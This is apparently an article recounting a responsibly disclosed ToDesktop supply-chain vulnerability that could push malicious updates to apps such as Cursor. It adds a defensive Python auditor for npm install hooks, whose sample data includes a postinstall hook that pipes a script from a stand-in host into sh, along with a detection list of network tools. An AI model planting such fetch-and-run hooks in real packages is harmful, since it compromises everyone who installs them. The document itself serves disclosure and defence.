In an intriguing cybersecurity tale, a tech enthusiast discovered a severe vulnerability in ToDesktop’s service. They began by investigating why the installer for the AI text editor Cursor connected to the unfamiliar domain ‘todesktop’, and found that ToDesktop is an Electron app bundler and SDK provider used by a range of desktop apps.
After creating an account on ToDesktop, the researcher noticed that the platform was built on Firebase. Digging further, they found insecurely configured collections that held sensitive data belonging to applications such as ClickUp, Linear and Notion Calendar (none of which were the target of the research), among others, with a potential impact on millions of users worldwide.
The core issue lay in ToDesktop’s deployment pipeline. After reverse engineering the service with the help of sourcemaps extracted from the @todesktop/cli package, the researcher found that a postinstall script allowed arbitrary code execution inside the build environment. That access exposed critical secrets stored unencrypted on the container, including Apple IDs and Firebase admin keys with full privileges.
With these credentials in hand, they demonstrated that malicious updates could be pushed to every affected app, taking effect as soon as the app was restarted: a devastating scenario had it been exploited maliciously. Fortunately, once the vulnerability had been reported responsibly, both parties acted swiftly; ToDesktop fixed the issue by moving the signing process into a privileged sidecar container that user-supplied build code cannot reach.
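The postinstall finding above rests on a general property of npm: lifecycle hooks in a dependency’s package.json run automatically during installation, with whatever credentials the build environment holds. As an added defensive illustration (not code from the article, from ToDesktop, or from the researcher), the following Python script audits a set of package.json manifests for install-time hooks and flags any that appear to reach out to the network. The sample manifests, the package names and the “network hint” heuristic are constructed for this example; the hook names are npm’s own.

```python
"""Audit npm lifecycle scripts that run automatically at install time.

Added illustration for the ToDesktop write-up; not code from the article
or from ToDesktop. All sample package.json contents are constructed.
"""
import json

# Hooks that npm runs on `npm install` without the developer invoking them.
INSTALL_TIME_HOOKS = (
    "preinstall", "install", "postinstall",
    "prepublish", "preprepare", "prepare", "postprepare",
)

# Substrings suggesting a hook downloads or pipes something from the network.
# Heuristic chosen for this example, not an npm feature.
NETWORK_HINTS = ("curl ", "wget ", "http://", "https://", "| sh", "| bash")


def audit_package(name: str, package_json: str) -> list[dict]:
    """Return one finding per install-time hook declared in a package.json."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_TIME_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        # Any install-time hook is worth a look; network access raises severity.
        severity = "high" if any(h in command for h in NETWORK_HINTS) else "medium"
        findings.append({"package": name, "hook": hook,
                         "command": command, "severity": severity})
    return findings


def audit_dependency_tree(manifests: dict[str, str]) -> list[dict]:
    """Audit every manifest in a {package name: package.json text} mapping."""
    findings = []
    for name, text in sorted(manifests.items()):
        findings.extend(audit_package(name, text))
    return findings


# Constructed sample: three dependencies, two of which declare install hooks.
SAMPLE_MANIFESTS = {
    "left-pad-ish": json.dumps({"name": "left-pad-ish", "version": "1.0.0",
                                "scripts": {"test": "node test.js"}}),
    "native-binding": json.dumps({"name": "native-binding", "version": "2.1.0",
                                  "scripts": {"install": "node-gyp rebuild"}}),
    "shady-helper": json.dumps({"name": "shady-helper", "version": "0.0.3",
                                "scripts": {"postinstall":
                                            "curl -s https://example.invalid/x.sh | sh"}}),
}

if __name__ == "__main__":
    for f in audit_dependency_tree(SAMPLE_MANIFESTS):
        print(f"[{f['severity']}] {f['package']}: {f['hook']} -> {f['command']}")
```

In a pipeline that holds signing keys or other secrets, the matching mitigation is to install dependencies with `npm ci --ignore-scripts` so that no hook runs in the privileged context, and to build any native addons that genuinely need an install step in a separate, credential-free stage. That is the same principle as ToDesktop’s fix: keep the signing material out of any environment where user-supplied code executes.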
The incident underscores that even small companies can face significant security challenges, and how much the quality of the response matters: in this case the researcher described ToDesktop’s response as “awesome” and received a bounty for their work, the exact amount of which remains confidential. Cursor later awarded them an additional $50k USD in recognition of their contribution to its security, after the issue had first been fixed with ToDesktop itself.
In conclusion, although vulnerabilities arise frequently in our digital landscape, responsible disclosure and swift action from both parties can limit the potential damage while fostering constructive collaboration between hackers and companies.